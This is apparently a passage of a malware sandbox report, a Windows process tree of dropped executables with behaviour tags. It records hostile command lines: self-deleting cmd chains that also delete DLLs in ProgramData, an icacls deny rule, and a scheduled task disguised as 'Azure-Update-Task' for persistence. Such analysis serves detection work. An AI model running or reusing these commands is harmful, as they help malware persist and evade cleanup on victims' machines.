                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 1152 -s 1368
                                                                                                                  13⤵
                                                                                                                  • Program crash
                                                                                                                  PID:7776
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\3002.exe
                                                                                                      "C:\Users\Admin\AppData\Local\Temp\3002.exe"
                                                                                                      7⤵
                                                                                                        PID:2388
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\3002.exe
                                                                                                          "C:\Users\Admin\AppData\Local\Temp\3002.exe" -a
                                                                                                          8⤵
                                                                                                          • Executes dropped EXE
                                                                                                          PID:5608
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
                                                                                                        "C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"
                                                                                                        7⤵
                                                                                                        • Executes dropped EXE
                                                                                                        PID:4156
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe
                                                                                                        "C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"
                                                                                                        7⤵
                                                                                                        • Executes dropped EXE
                                                                                                        PID:5148
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  C:\Windows\system32\cmd.exe /c Sun198361825f4.exe
                                                                                                  4⤵
                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                  PID:4296
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS45F8F8E0\Sun198361825f4.exe
                                                                                                    Sun198361825f4.exe
                                                                                                    5⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:4388
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  C:\Windows\system32\cmd.exe /c Sun1966fb31dd5a07.exe
                                                                                                  4⤵
                                                                                                    PID:4436
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    C:\Windows\system32\cmd.exe /c Sun195a1614ec24e6a.exe
                                                                                                    4⤵
                                                                                                      PID:4376
                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                      C:\Windows\system32\cmd.exe /c Sun1905815e51282417.exe
                                                                                                      4⤵
                                                                                                        PID:4316
                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                        C:\Windows\system32\cmd.exe /c Sun19eb40faaaa9.exe
                                                                                                        4⤵
                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                        PID:4240
                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                        C:\Windows\system32\cmd.exe /c Sun1908b94df837b3158.exe
                                                                                                        4⤵
                                                                                                          PID:4152
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS45F8F8E0\Sun19eb40faaaa9.exe
                                                                                                    Sun19eb40faaaa9.exe
                                                                                                    1⤵
                                                                                                    • Executes dropped EXE
                                                                                                    PID:4400
                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                      "C:\Windows\System32\cmd.exe" /c taskkill /im Sun19eb40faaaa9.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\7zS45F8F8E0\Sun19eb40faaaa9.exe" & del C:\ProgramData\*.dll & exit
                                                                                                      2⤵
                                                                                                        PID:6608
                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                          taskkill /im Sun19eb40faaaa9.exe /f
                                                                                                          3⤵
                                                                                                          • Kills process with taskkill
                                                                                                          PID:6380
                                                                                                        • C:\Windows\SysWOW64\timeout.exe
                                                                                                          timeout /t 6
                                                                                                          3⤵
                                                                                                          • Delays execution with timeout.exe
                                                                                                          PID:4968
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS45F8F8E0\Sun1966fb31dd5a07.exe
                                                                                                      Sun1966fb31dd5a07.exe
                                                                                                      1⤵
                                                                                                      • Executes dropped EXE
                                                                                                      PID:4636
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-0JHRT.tmp\Sun1966fb31dd5a07.tmp
                                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-0JHRT.tmp\Sun1966fb31dd5a07.tmp" /SL5="$800FA,247014,163328,C:\Users\Admin\AppData\Local\Temp\7zS45F8F8E0\Sun1966fb31dd5a07.exe"
                                                                                                        2⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Loads dropped DLL
                                                                                                        PID:4812
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-S4L34.tmp\Ze2ro.exe
                                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-S4L34.tmp\Ze2ro.exe" /S /UID=burnerch2
                                                                                                          3⤵
                                                                                                          • Executes dropped EXE
                                                                                                          PID:4384
                                                                                                          • C:\Program Files\Windows Media Player\AVUCEXSYNJ\ultramediaburner.exe
                                                                                                            "C:\Program Files\Windows Media Player\AVUCEXSYNJ\ultramediaburner.exe" /VERYSILENT
                                                                                                            4⤵
                                                                                                              PID:4848
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-VTAQT.tmp\ultramediaburner.tmp
                                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-VTAQT.tmp\ultramediaburner.tmp" /SL5="$3024C,281924,62464,C:\Program Files\Windows Media Player\AVUCEXSYNJ\ultramediaburner.exe" /VERYSILENT
                                                                                                                5⤵
                                                                                                                • Executes dropped EXE
                                                                                                                • Loads dropped DLL
                                                                                                                • Drops file in Program Files directory
                                                                                                                • Suspicious use of FindShellTrayWindow
                                                                                                                PID:5624
                                                                                                                • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                  "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                                                                                                  6⤵
                                                                                                                    PID:4516
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\5a-247aa-075-be092-3edd7683af37c\Gitipixaeqo.exe
                                                                                                                "C:\Users\Admin\AppData\Local\Temp\5a-247aa-075-be092-3edd7683af37c\Gitipixaeqo.exe"
                                                                                                                4⤵
                                                                                                                  PID:4304
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\65-1c5d7-258-7e4b0-01279d82e772b\Lakajibulae.exe
                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\65-1c5d7-258-7e4b0-01279d82e772b\Lakajibulae.exe"
                                                                                                                  4⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  PID:2388
                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zvjvcezy.g0d\GcleanerEU.exe /eufive & exit
                                                                                                                    5⤵
                                                                                                                      PID:7104
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\zvjvcezy.g0d\GcleanerEU.exe
                                                                                                                        C:\Users\Admin\AppData\Local\Temp\zvjvcezy.g0d\GcleanerEU.exe /eufive
                                                                                                                        6⤵
                                                                                                                          PID:5752
                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5752 -s 648
                                                                                                                            7⤵
                                                                                                                            • Program crash
                                                                                                                            PID:7676
                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5752 -s 660
                                                                                                                            7⤵
                                                                                                                            • Program crash
                                                                                                                            PID:7760
                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5752 -s 764
                                                                                                                            7⤵
                                                                                                                            • Program crash
                                                                                                                            PID:7936
                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5752 -s 812
                                                                                                                            7⤵
                                                                                                                            • Program crash
                                                                                                                            PID:8124
                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5752 -s 888
                                                                                                                            7⤵
                                                                                                                            • Program crash
                                                                                                                            PID:6820
                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5752 -s 1100
                                                                                                                            7⤵
                                                                                                                            • Program crash
                                                                                                                            PID:5288
                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\m0shh1ey.kzy\installer.exe /qn CAMPAIGN="654" & exit
                                                                                                                        5⤵
                                                                                                                          PID:6176
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\m0shh1ey.kzy\installer.exe
                                                                                                                            C:\Users\Admin\AppData\Local\Temp\m0shh1ey.kzy\installer.exe /qn CAMPAIGN="654"
                                                                                                                            6⤵
                                                                                                                              PID:7064
                                                                                                                              • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\m0shh1ey.kzy\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\m0shh1ey.kzy\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1632126475 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
                                                                                                                                7⤵
                                                                                                                                  PID:8176
                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\kl22jlin.blu\anyname.exe & exit
                                                                                                                              5⤵
                                                                                                                                PID:5876
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\kl22jlin.blu\anyname.exe
                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\kl22jlin.blu\anyname.exe
                                                                                                                                  6⤵
                                                                                                                                    PID:7144
                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lgpc5y0a.oeh\gcleaner.exe /mixfive & exit
                                                                                                                                  5⤵
                                                                                                                                    PID:6512
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\lgpc5y0a.oeh\gcleaner.exe
                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\lgpc5y0a.oeh\gcleaner.exe /mixfive
                                                                                                                                      6⤵
                                                                                                                                        PID:6908
                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 6908 -s 648
                                                                                                                                          7⤵
                                                                                                                                          • Program crash
                                                                                                                                          PID:7304
                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 6908 -s 688
                                                                                                                                          7⤵
                                                                                                                                          • Program crash
                                                                                                                                          PID:6388
                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 6908 -s 764
                                                                                                                                          7⤵
                                                                                                                                          • Program crash
                                                                                                                                          PID:64
                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 6908 -s 812
                                                                                                                                          7⤵
                                                                                                                                          • Program crash
                                                                                                                                          PID:1324
                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 6908 -s 832
                                                                                                                                          7⤵
                                                                                                                                          • Program crash
                                                                                                                                          PID:1328
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS45F8F8E0\Sun195a1614ec24e6a.exe
                                                                                                                              Sun195a1614ec24e6a.exe
                                                                                                                              1⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                              PID:4784
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS45F8F8E0\Sun1905815e51282417.exe
                                                                                                                              Sun1905815e51282417.exe
                                                                                                                              1⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              PID:4624
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS45F8F8E0\Sun1908b94df837b3158.exe
                                                                                                                              Sun1908b94df837b3158.exe
                                                                                                                              1⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              • Checks SCSI registry key(s)
                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                                                              PID:4496
                                                                                                                            • C:\Windows\system32\rundll32.exe
                                                                                                                              rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                              1⤵
                                                                                                                              • Process spawned unexpected child process
                                                                                                                              PID:1792
                                                                                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                2⤵
                                                                                                                                • Loads dropped DLL
                                                                                                                                • Modifies registry class
                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                PID:1460
                                                                                                                            • C:\Windows\system32\rundll32.exe
                                                                                                                              rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                              1⤵
                                                                                                                              • Process spawned unexpected child process
                                                                                                                              PID:6584
                                                                                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                2⤵
                                                                                                                                  PID:6620
                                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                1⤵
                                                                                                                                  PID:7128
                                                                                                                                • C:\Windows\system32\browser_broker.exe
                                                                                                                                  C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                  1⤵
                                                                                                                                    PID:6664
                                                                                                                                  • C:\Windows\system32\msiexec.exe
                                                                                                                                    C:\Windows\system32\msiexec.exe /V
                                                                                                                                    1⤵
                                                                                                                                      PID:7768
                                                                                                                                      • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                        C:\Windows\syswow64\MsiExec.exe -Embedding 2B7748D95B5F964BDB833F31A7D6F13E C
                                                                                                                                        2⤵
                                                                                                                                          PID:8012
                                                                                                                                        • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                          C:\Windows\syswow64\MsiExec.exe -Embedding 1DC1D1AC3755C031B3B439C796E6B6D9
                                                                                                                                          2⤵
                                                                                                                                            PID:8144
                                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                              "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
                                                                                                                                              3⤵
                                                                                                                                              • Kills process with taskkill
                                                                                                                                              PID:6828
                                                                                                                                          • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                            C:\Windows\syswow64\MsiExec.exe -Embedding 895484E27FA5977FF4CA49C95F3CAC48 E Global\MSI0000
                                                                                                                                            2⤵
                                                                                                                                              PID:1504
                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                            1⤵
                                                                                                                                              PID:7896
                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                              1⤵
                                                                                                                                                PID:5748
                                                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                1⤵
                                                                                                                                                  PID:4152
                                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                  1⤵
                                                                                                                                                    PID:8140
                                                                                                                                                  • C:\Windows\system32\rundll32.exe
                                                                                                                                                    rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                    1⤵
                                                                                                                                                    • Process spawned unexpected child process
                                                                                                                                                    PID:4312
                                                                                                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                      rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                      2⤵
                                                                                                                                                        PID:4960
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\981F.exe
                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\981F.exe
                                                                                                                                                      1⤵
                                                                                                                                                        PID:3248
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\C819.exe
                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\C819.exe
                                                                                                                                                        1⤵
                                                                                                                                                          PID:7564
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\C819.exe
                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\C819.exe
                                                                                                                                                            2⤵
                                                                                                                                                              PID:7640
                                                                                                                                                              • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                icacls "C:\Users\Admin\AppData\Local\98298dc1-a0af-453a-a14b-531796a4e14c" /deny *S-1-1-0:(OI)(CI)(DE,DC)
                                                                                                                                                                3⤵
                                                                                                                                                                • Modifies file permissions
                                                                                                                                                                PID:7200
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\C819.exe
                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\C819.exe" --Admin IsNotAutoStart IsNotTask
                                                                                                                                                                3⤵
                                                                                                                                                                  PID:6680
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\C819.exe
                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\C819.exe" --Admin IsNotAutoStart IsNotTask
                                                                                                                                                                    4⤵
                                                                                                                                                                      PID:752
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\c06ec1f9-1910-44aa-bc0d-53d64ceae3d1\build2.exe
                                                                                                                                                                        "C:\Users\Admin\AppData\Local\c06ec1f9-1910-44aa-bc0d-53d64ceae3d1\build2.exe"
                                                                                                                                                                        5⤵
                                                                                                                                                                          PID:2208
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\c06ec1f9-1910-44aa-bc0d-53d64ceae3d1\build2.exe
                                                                                                                                                                            "C:\Users\Admin\AppData\Local\c06ec1f9-1910-44aa-bc0d-53d64ceae3d1\build2.exe"
                                                                                                                                                                            6⤵
                                                                                                                                                                              PID:7988
                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /c taskkill /im build2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\c06ec1f9-1910-44aa-bc0d-53d64ceae3d1\build2.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                                7⤵
                                                                                                                                                                                  PID:6436
                                                                                                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                    taskkill /im build2.exe /f
                                                                                                                                                                                    8⤵
                                                                                                                                                                                    • Kills process with taskkill
                                                                                                                                                                                    PID:4688
                                                                                                                                                                                  • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                    timeout /t 6
                                                                                                                                                                                    8⤵
                                                                                                                                                                                    • Delays execution with timeout.exe
                                                                                                                                                                                    PID:4564
                                                                                                                                                                            • C:\Users\Admin\AppData\Local\c06ec1f9-1910-44aa-bc0d-53d64ceae3d1\build3.exe
                                                                                                                                                                              "C:\Users\Admin\AppData\Local\c06ec1f9-1910-44aa-bc0d-53d64ceae3d1\build3.exe"
                                                                                                                                                                              5⤵
                                                                                                                                                                                PID:7224
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\c06ec1f9-1910-44aa-bc0d-53d64ceae3d1\build3.exe
                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\c06ec1f9-1910-44aa-bc0d-53d64ceae3d1\build3.exe"
                                                                                                                                                                                  6⤵
                                                                                                                                                                                    PID:6100
                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                      /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
                                                                                                                                                                                      7⤵
                                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                                      PID:7336
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\E6CE.exe
                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\E6CE.exe
                                                                                                                                                                          1⤵
                                                                                                                                                                            PID:8048
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\63E.exe
                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\63E.exe
                                                                                                                                                                            1⤵
                                                                                                                                                                              PID:6080
                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\3F60.exe
                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\3F60.exe
                                                                                                                                                                              1⤵
                                                                                                                                                                                PID:7932
                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\50C6.exe
                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\50C6.exe
                                                                                                                                                                                1⤵
                                                                                                                                                                                  PID:7656
                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                    cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\50C6.exe"
                                                                                                                                                                                    2⤵
                                                                                                                                                                                      PID:3424
                                                                                                                                                                                      • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                        timeout /T 10 /NOBREAK
                                                                                                                                                                                        3⤵
                                                                                                                                                                                        • Delays execution with timeout.exe
                                                                                                                                                                                        PID:6464
                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe
                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe" /update
                                                                                                                                                                                    1⤵
                                                                                                                                                                                      PID:4724
                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe
                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe /update /peruser /childprocess
                                                                                                                                                                                        2⤵
                                                                                                                                                                                          PID:5408
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.160.0808.0002\FileSyncConfig.exe
                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.160.0808.0002\FileSyncConfig.exe"
                                                                                                                                                                                            3⤵
                                                                                                                                                                                              PID:1328
                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                          1⤵
                                                                                                                                                                                            PID:4844
                                                                                                                                                                                          • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                            C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                            1⤵
                                                                                                                                                                                              PID:1528
                                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                              1⤵
                                                                                                                                                                                                PID:1260
                                                                                                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                1⤵
                                                                                                                                                                                                  PID:6804
                                                                                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                                                                                  PID:2380
                                                                                                                                                                                                • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                    PID:4628
                                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                      PID:7184
                                                                                                                                                                                                    • C:\Windows\system32\compattelrunner.exe
                                                                                                                                                                                                      C:\Windows\system32\compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW
                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                        PID:6160
                                                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                          PID:7964
                                                                                                                                                                                                        • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                          C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                            PID:4796
                                                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                              PID:524
                                                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                PID:5540
                                                                                                                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                  PID:6156
                                                                                                                                                                                                                • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                  C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                    PID:6644
                                                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                      PID:5140
